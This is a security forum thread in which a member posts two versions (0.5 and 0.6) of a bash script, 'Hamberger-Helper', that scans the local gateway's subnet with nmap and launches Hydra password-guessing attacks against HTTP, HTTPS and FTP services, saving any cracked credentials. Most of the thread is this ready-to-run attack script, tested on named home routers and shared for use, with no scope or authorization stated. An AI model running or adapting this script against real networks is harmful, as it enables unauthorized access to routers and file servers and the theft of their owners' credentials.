Thread: Hamberger-Helper v0.5 Automated Password Cracker

  1. #1
    Senior Member
    Join Date
    May 2010
    Posts
    198

    Hamberger-Helper v0.5 Automated Password Cracker

    I know there are probably 100 of these already but this was just practice. More to come.

    Instructions:
    edit password file path
    run script

    The script is only as good as the list but is only intended to find passwords from a small list.
    It currently takes 3 minutes to run the script with 10 users and 12 passwords in the list files on 3 different protocols.

    This only supports (for now):
    HTTP
    HTTPS
    FTP
    SMB (coming soon) as soon as I figure out smbv2
    TELNET (Maybe soon)


    Code:
    #!/bin/bash
                              version=0.5
                            passwords=/root/passwords.lst           #Where to store found passwords#
    #                             Wordlists
                             username=/root/Hydra/user.lst          #Change this!!!!!!
                             dictpath=/root/Hydra/pass.lst          #Change this!!!!!!
    #                           Hydra Options
                                tasks=15                            #Hydra tasks
    #                              Output
                              logfile=/tmp/hydra/logfile.lst        #will be adding to this for verbosity
    #                            Nmap Options
                          scanresults=/tmp/hydra/scanresults.lst    #Temp nmap scan output
    #                            Misc.
                                 temp=/tmp/hydra
    echo "#####################################"
    echo "   Welcome to Hamburger-Helper v$version"
    echo "    Automated password cracker"
    echo " (C)opyright 2010 - Scamentology"
    echo "#####################################"
    echo "check $passwords for results"
    echo "#####################################"
    #######################################
    # (C)opyright 2010 - Scamentology                                                              #
    #---License------------------------------------------------------------------------------------#
    #  This program is free software: you can redistribute it and/or modify it under the terms     #
    #  of the GNU General Public License as published by the Free Software Foundation, either      #
    #  version 3 of the License, or (at your option) any later version.                            #
    #                                                                                              #
    #  This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;   #
    #  without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.   #
    #  See the GNU General Public License for more details.                                        #
    #                                                                                              #
    #  You should have received a copy of the GNU General Public License along with this program.  #
    #  If not, see <http://www.gnu.org/licenses/>
    #----------------------------------------------------------------------------------------------#
    #This is my first stab at a shell script so don't be rude.
    #It was tested on the following routers
    #--Linksys WRT54G
    #--airlink-101
    #--Does not work on JAVA based routers (I gave up on that) You will just get everything as a valid pair.
    #--Filezilla works well (keep tasks below 15)
    #Instructions
    #You will need to give the path to your password list then run the script
    #---------------------------------------------------------------------------------------------------------------------#
    #Must have Nmap and Hydra installed; Tested on Backtrack 4 R1
    #The program will install it for you
    #---------------------------------------------------------------------------------------------------------------------------------#
    #
    #
    #
    #
    mkdir /tmp/hydra/ 2>/dev/null
    #The action/display helpers are not defined anywhere in this script, so the commands are called directly
    if [ ! -e "/usr/bin/nmap" ] ; then
       echo "Nmap is not installed."
       read -p ">> Would you like to try and install it? [Y/n]: " -n 1
       if [[ "$REPLY" =~ ^[Yy]$ ]] ; then apt-get -y install nmap ; fi
       if [ ! -e "/usr/share/nmap/nmap-services" ] ; then
          echo "Failed to install Nmap"
       else
          echo "Installed: Nmap"
       fi
    fi
    if [ ! -e "/usr/bin/hydra" ] ; then
       echo "Hydra is not installed."
       read -p ">> Would you like to try and install it? [Y/n]: " -n 1
       if [[ "$REPLY" =~ ^[Yy]$ ]] ; then apt-get -y install hydra ; fi
       if [ ! -e "/usr/bin/hydra" ] ; then
          echo "Failed to install Hydra"
       else
          echo "Installed: Hydra"
       fi
    fi
    echo "Nmap and Hydra are installed"
    IP=$(ip route | grep default | awk '{ print $3}')                                           #Gives us The Gateway IP address
    smb=""
    https=""
    ftp=""
    telnet=""
    echo "<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>"
    echo "Finding Alive Hosts and Scanning them"
    echo "<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>"
    nmap=$(nmap -oG $temp/scanresults.lst $IP/24)                                                       #Tells us what ports are open.
    smb=$(grep '139/open' $scanresults | awk '{ print $2}')
    if [ "$smb" == "" ]; then echo "No Open File Shares" ; fi
       if [ "$smb" != "" ]; then grep '139/open' $scanresults | awk '{ print $2}' >> $temp/smb.lst ; fi    
    http=$(grep '80/open' $scanresults | awk '{ print $2}')
    if [ "$http" == "" ]; then echo "No HTTP Servers" ; fi
       if [ "$http" != "" ]; then grep '80/open' $scanresults | awk '{ print $2}' >> $temp/http.lst ; fi
    https=$(grep '443/open' $scanresults | awk '{ print $2}')
    if [ "$https" == "" ]; then echo "No HTTPS Servers" ; fi
       if [ "$https" != "" ]; then grep '443/open' $scanresults | awk '{ print $2}' >> $temp/https.lst ; fi
    ftp=$(grep '21/open' $scanresults | awk '{ print $2}')
    if [ "$ftp" == "" ]; then echo "No FTP Servers" ; fi
       if [ "$ftp" != "" ]; then grep '21/open' $scanresults | awk '{ print $2}' >> $temp/ftp.lst ; fi
    telnet=$(grep '23/open' $scanresults | awk '{ print $2}')
    if [ "$telnet" == "" ]; then echo "No Telnet Servers" ; fi
       if [ "$telnet" != "" ]; then grep '23/open' $scanresults | awk '{ print $2}' >> $temp/telnet.lst ; fi
    #
    #
    #
    #Router Password Guesser
    ######################################
    #
    #
    #
    #-----------------------------#
    #           HTTP              #
    #-----------------------------#
    if [ -e "$temp/http.lst" ] ; then
    echo "<<<<<<<<<>>>>>>>>>>>"
    echo "Attacking on Port 80"
    echo "<<<<<<<<<>>>>>>>>>>>"
    xterm -geometry 75x15+10+215 -T "Hydra-Helper v$version - Cracking Router" -e "hydra -L $username -P $dictpath -e n -e s -t $tasks -f -w 15 -v $IP http-get / -o $temp/tmp1.lst" 
    grep 'password' $temp/tmp1.lst >> $temp/rec1.lst
       if [ -e "$temp/rec1.lst" ] ; then grep 'password' $temp/tmp1.lst >> $temp/http1.lst ; fi
       if [ ! -e "$temp/rec1.lst" ] ; then echo "HTTP Attack Failed" >> $logfile ; fi
    rm $temp/tmp1.lst 2>/dev/null
    fi
    #-----------------------------#
    #           HTTPS             #
    #-----------------------------#
    if [ -e "$temp/https.lst" ] ; then
    echo "<<<<<<<<<>>>>>>>>>>>>"
    echo "Attacking on Port 443"
    echo "<<<<<<<<<>>>>>>>>>>>>"
    xterm -geometry 75x15+10+215 -T "Hydra-Helper v$version - Cracking Router" -e "hydra -L $username -P $dictpath -S -e n -e s -t $tasks -f -w 15 -v $IP https-get / -o $temp/tmp2.lst" 
    grep 'password' $temp/tmp2.lst >> $temp/rec2.lst
       if [ -e "$temp/rec2.lst" ] ; then grep 'password' $temp/rec2.lst >> $temp/https2.lst ; fi
       if [ ! -e "$temp/rec2.lst" ] ; then echo "HTTPS Attack Failed" >> $logfile ; fi
    rm $temp/tmp2.lst 2>/dev/null
    fi
    #-----------------------------#
    #            FTP              #
    #-----------------------------#
    if [ -e "$temp/ftp.lst" ] ; then
    echo "<<<<<<<<<>>>>>>>>>>>"
    echo "Attacking on Port 21"
    echo "<<<<<<<<<>>>>>>>>>>>"
    xterm -geometry 75x15+10+215 -T "Hydra-Helper v$version - Cracking Router" -e "hydra -M $temp/ftp.lst ftp -s 21 -v -L $username -P $dictpath -e n -e s -t 15 -f -o $temp/tmp3.lst" 
    grep 'password' $temp/tmp3.lst >> $temp/rec3.lst
       if [ -e "$temp/rec3.lst" ] ; then grep 'password' $temp/tmp3.lst >> $temp/ftp3.lst ; fi
       if [ ! -e "$temp/rec3.lst" ] ; then echo "FTP Attack Failed" >> $logfile ; fi
    rm $temp/tmp3.lst $http 2>/dev/null
    fi
    #-----------------------------#
    #            SMB              #
    #-----------------------------#
    if [ -e "$temp/smb.lst" ] ; then
    echo "<<<<<<<<<<<>>>>>>>>>>>>"
    echo "SMB Support Coming Soon"
    echo "<<<<<<<<<<<>>>>>>>>>>>>"
    fi
    #-----------------------------#
    #           TELNET            #
    #-----------------------------#
    if [ -e "$temp/telnet.lst" ] ; then
    echo "<<<<<<<<<<<<<>>>>>>>>>>>>>"
    echo "Telnet Support Coming Soon"
    echo "<<<<<<<<<<<<<>>>>>>>>>>>>>"
    fi
    #
    #
    #
    sleep 5
    #
    #
    echo "Gathering Passwords"
    if [ ! -e "$temp/http1.lst" ] ; then
       echo "No HTTP passwords found" ; fi
    if [ -e "$temp/http1.lst" ] ; then
       cat $temp/http1.lst >> $passwords 2>/dev/null ; fi
    if [ ! -e "$temp/https2.lst" ] ; then
       echo "No HTTPS passwords found" ; fi
    if [ -e "$temp/https2.lst" ] ; then
       cat $temp/https2.lst >> $passwords 2>/dev/null ; fi
    if [ ! -e "$temp/ftp3.lst" ] ; then
       echo "No FTP passwords found" ; fi
    if [ -e "$temp/ftp3.lst" ] ; then
       cat $temp/ftp3.lst >> $passwords 2>/dev/null ; fi
    if [ ! -e "$temp/smb4.lst" ] ; then
       echo "No SMB passwords found" ; fi
    if [ -e "$temp/smb4.lst" ] ; then
       cat $temp/smb4.lst >> $passwords 2>/dev/null ; fi
    if [ ! -e "$temp/telnet5.lst" ] ; then
       echo "No Telnet passwords found" ; fi
    if [ -e "$temp/telnet5.lst" ] ; then
       cat $temp/telnet5.lst >> $passwords 2>/dev/null ; fi
    #If no passwords - Do next
    if [ ! -e "$passwords" ] ; then 
       echo "No passwords recovered" ; fi
    cat $logfile 2>/dev/null
    cat $passwords
    #cleanup...
    killall xterm hydra 2>/dev/null
    rm $temp/* 2>/dev/null
    exit
    #
    #
    #
    #todo
    #add errors for missing stuff
    #add interrupt and cleanup
    #add auto time and date to details
    #add different lists for different tasks (to speed this up a bit)
    #add scan for router discovery. (to customize attacks)
    #add option to retry different router pages
    "Never do anything against conscience -- even if the state demands it."
    -- Albert Einstein

  2. #2
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Re: Hamberger-Helper v0.5 Automated Password Cracker

    The How-to section is for tutorials on tools found in BT.
    Moved.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  3. #3
    Senior Member
    Join Date
    May 2010
    Posts
    198

    Re: Hamberger-Helper v0.5 Automated Password Cracker

    Thanks, I was wondering where to put this. I'm not an expert and it wasn't quite a how to.

    Here's an update with bug fixes and some error reporting. Again this is just to practice my shell scripting. I just thought someone else might find it useful.

    I've taken a lot without giving to this community so this is my attempt at returning the favor.

    [code]
    #!/bin/bash
    version=0.6
    passwords=/root/passwords.lst #Where to store found passwords#
    # Wordlists
    username=/root/Hydr/user.lst #Change this!!!!!!
    dictpath=/root/Hydr/pass.lst #Change this!!!!!!
    # Hydra Options
    tasks=15 #Hydra tasks
    # Output
    logfile=/tmp/hydra/logfile.lst #will be adding to this for verbosity
    # Nmap Options
    scanresults=/tmp/hydra/scanresults.lst #Temp nmap scan output
    # Misc.
    temp=/tmp/hydra
    echo "#####################################"
    echo " Welcome to Hamburger-Helper v$version"
    echo " Automated password cracker"
    echo " (C)opyright 2010 - Scamentology"
    echo "#####################################"
    echo "check $passwords for results"
    echo "#####################################"
    #######################################
    # (C)opyright 2010 - Scamentology #
    #---License------------------------------------------------------------------------------------#
    # This program is free software: you can redistribute it and/or modify it under the terms #
    # of the GNU General Public License as published by the Free Software Foundation, either #
    # version 3 of the License, or (at your option) any later version. #
    # #
    # This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; #
    # without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. #
    # See the GNU General Public License for more details. #
    # #
    # You should have received a copy of the GNU General Public License along with this program. #
    # If not, see <http://www.gnu.org/licenses/>
    #----------------------------------------------------------------------------------------------#
    #This is my first stab at a shell script so don't be rude.
    #It was tested on the following routers
    #--Linksys WRT54G
    #--airlink-101
    #--Does not work on JAVA based routers (I gave up on that) You will just get everything as a valid pair.
    #--Filezilla works well (keep tasks below 15)
    #--Get too many bugs with SMB
    #Instructions
    #You will need to give the path to your password list then run the script
    #---------------------------------------------------------------------------------------------------------------------#
    #Must have Nmap and Hydra installed; Tested on Backtrack 4 R1
    #The program will install it for you
    #---------------------------------------------------------------------------------------------------------------------------------#
    #
    #
    #
    #
    mkdir $temp/ 2>/dev/null
    #The action/display helpers are not defined anywhere in this script, so the commands are called directly
    if [ ! -e "/usr/bin/nmap" ] ; then
    echo "Nmap is not installed."
    read -p ">> Would you like to try and install it? [Y/n]: " -n 1
    if [[ "$REPLY" =~ ^[Yy]$ ]] ; then apt-get -y install nmap ; fi
    if [ ! -e "/usr/share/nmap/nmap-services" ] ; then
    echo "Failed to install Nmap"
    else
    echo "Installed: Nmap"
    fi
    fi
    if [ ! -e "/usr/bin/hydra" ] ; then
    echo "Hydra is not installed."
    read -p ">> Would you like to try and install it? [Y/n]: " -n 1
    if [[ "$REPLY" =~ ^[Yy]$ ]] ; then apt-get -y install hydra ; fi
    if [ ! -e "/usr/bin/hydra" ] ; then
    echo "Failed to install Hydra"
    else
    echo "Installed: Hydra"
    fi
    fi
    echo "Nmap and Hydra are installed"
    if [ ! -e "$username" ] ; then
    echo "Username path not specified" ;
    exit 1
    fi
    if [ ! -e "$dictpath" ] ; then
    echo "Dictionary path not specified" ;
    exit 1
    fi
    IP=$(ip route | grep default | awk '{ print $3}') #Gives us The Gateway IP address
    smb=""
    https=""
    ftp=""
    telnet=""
    echo "<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>"
    echo "Finding Alive Hosts and Scanning them"
    echo "<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>"
    nmap=$(nmap -oG $scanresults $IP/24) #Tells us what ports are open.
    smb=$(grep '139/open' $scanresults | awk '{ print $2}')
    if [ "$smb" == "" ]; then echo "No Open File Shares" ; fi
    if [ "$smb" != "" ]; then grep '139/open' $scanresults | awk '{ print $2}' >> $temp/smb.lst ; fi
    http=$(grep '80/open' $scanresults | awk '{ print $2}')
    if [ "$http" == "" ]; then echo "No HTTP Servers" ; fi
    if [ "$http" != "" ]; then grep '80/open' $scanresults | awk '{ print $2}' >> $temp/http.lst ; fi
    https=$(grep '443/open' $scanresults | awk '{ print $2}')
    if [ "$https" == "" ]; then echo "No HTTPS Servers" ; fi
    if [ "$https" != "" ]; then grep '443/open' $scanresults | awk '{ print $2}' >> $temp/https.lst ; fi
    ftp=$(grep '21/open' $scanresults | awk '{ print $2}')
    if [ "$ftp" == "" ]; then echo "No FTP Servers" ; fi
    if [ "$ftp" != "" ]; then grep '21/open' $scanresults | awk '{ print $2}' >> $temp/ftp.lst ; fi
    telnet=$(grep '23/open' $scanresults | awk '{ print $2}')
    if [ "$telnet" == "" ]; then echo "No Telnet Servers" ; fi
    if [ "$telnet" != "" ]; then grep '23/open' $scanresults | awk '{ print $2}' >> $temp/telnet.lst ; fi
    #
    #
    #-----------------------------#
    # HTTP #
    #-----------------------------#
    if [ -e "$temp/http.lst" ] ; then
    echo "<<<<<<<<<>>>>>>>>>>>"
    echo "Attacking on Port 80"
    echo "<<<<<<<<<>>>>>>>>>>>"
    #Results are read from the -o file below; echo ignores piped input and always printed "Password found"
    xterm -geometry 75x15+10+215 -T "Hydra-Helper v$version - Cracking HTTP" -e "hydra -L $username -P $dictpath -e n -e s -t $tasks -f -w 15 -v $IP http-get / -o $temp/tmp1.lst"
    grep 'password' $temp/tmp1.lst >> $temp/rec1.lst
    if [ -e "$temp/rec1.lst" ] ; then grep 'password' $temp/tmp1.lst >> $temp/http1.lst ; fi
    if [ ! -e "$temp/rec1.lst" ] ; then echo "HTTP Attack Failed" >> $logfile ; fi
    rm $temp/tmp1.lst 2>/dev/null
    fi
    #-----------------------------#
    # HTTPS #
    #-----------------------------#
    if [ -e "$temp/https.lst" ] ; then
    echo "<<<<<<<<<>>>>>>>>>>>>"
    echo "Attacking on Port 443"
    echo "<<<<<<<<<>>>>>>>>>>>>"
    #Results are read from the -o file below; the stray ">> |" was a syntax error and echo ignores piped input
    xterm -geometry 75x15+10+215 -T "Hydra-Helper v$version - Cracking HTTPS" -e "hydra -L $username -P $dictpath -S -e n -e s -t $tasks -f -w 15 -v $IP https-get / -o $temp/tmp2.lst"
    grep 'password' $temp/tmp2.lst >> $temp/rec2.lst
    if [ -e "$temp/rec2.lst" ] ; then grep 'password' $temp/rec2.lst >> $temp/https2.lst ; fi
    if [ ! -e "$temp/rec2.lst" ] ; then echo "HTTPS Attack Failed" >> $logfile ; fi
    rm $temp/tmp2.lst 2>/dev/null
    fi
    #-----------------------------#
    # FTP #
    #-----------------------------#
    if [ -e "$temp/ftp.lst" ] ; then
    echo "<<<<<<<<<>>>>>>>>>>>"
    echo "Attacking on Port 21"
    echo "<<<<<<<<<>>>>>>>>>>>"
    #Results are read from the -o file below; echo ignores piped input and always printed "Password found"
    xterm -geometry 75x15+10+215 -T "Hydra-Helper v$version - Cracking FTP" -e "hydra -M $temp/ftp.lst ftp -s 21 -v -L $username -P $dictpath -e n -e s -t 15 -f -o $temp/tmp3.lst"
    grep 'password' $temp/tmp3.lst >> $temp/rec3.lst
    if [ -e "$temp/rec3.lst" ] ; then grep 'password' $temp/tmp3.lst >> $temp/ftp3.lst ; fi
    if [ ! -e "$temp/rec3.lst" ] ; then echo "FTP Attack Failed" >> $logfile ; fi
    rm $temp/tmp3.lst 2>/dev/null
    fi
    #-----------------------------#
    # SMB #
    #-----------------------------#
    if [ -e "$temp/smb.lst" ] ; then
    echo "<<<<<<<<<<<>>>>>>>>>>>>"
    echo "SMB Support Coming Soon"
    echo "<<<<<<<<<<<>>>>>>>>>>>>"
    fi
    #-----------------------------#
    # TELNET #
    #-----------------------------#
    if [ -e "$temp/telnet.lst" ] ; then
    echo "<<<<<<<<<<<<<>>>>>>>>>>>>>"
    echo "Telnet Support Coming Soon"
    echo "<<<<<<<<<<<<<>>>>>>>>>>>>>"
    fi
    #
    #
    #
    sleep 5
    #
    #
    echo "Gathering Passwords"
    date >> $passwords
    if [ ! -e "$temp/http1.lst" ] ; then
    echo "No HTTP passwords found" ; fi
    if [ -e "$temp/http1.lst" ] ; then
    cat $temp/http1.lst >> $passwords 2>/dev/null ; fi
    if [ ! -e "$temp/https2.lst" ] ; then
    echo "No HTTPS passwords found" ; fi
    if [ -e "$temp/https2.lst" ] ; then
    cat $temp/https2.lst >> $passwords 2>/dev/null ; fi
    if [ ! -e "$temp/ftp3.lst" ] ; then
    echo "No FTP passwords found" ; fi
    if [ -e "$temp/ftp3.lst" ] ; then
    cat $temp/ftp3.lst >> $passwords 2>/dev/null ; fi
    if [ ! -e "$temp/smb4.lst" ] ; then
    echo "No SMB passwords found" ; fi
    if [ -e "$temp/smb4.lst" ] ; then
    cat $temp/smb4.lst >> $passwords 2>/dev/null ; fi
    if [ ! -e "$temp/telnet5.lst" ] ; then
    echo "No Telnet passwords found" ; fi
    if [ -e "$temp/telnet5.lst" ] ; then
    cat $temp/telnet5.lst >> $passwords 2>/dev/null ; fi
    #If no passwords - Do next
    if [ ! -e "$passwords" ] ; then
    echo "No passwords recovered" ; fi
    cat $logfile 2>/dev/null
    cat $passwords
    #cleanup...
    killall xterm hydra 2>/dev/null
    rm $temp/* 2>/dev/null
    exit
    [/code]
    "Never do anything against conscience -- even if the state demands it."
    -- Albert Einstein
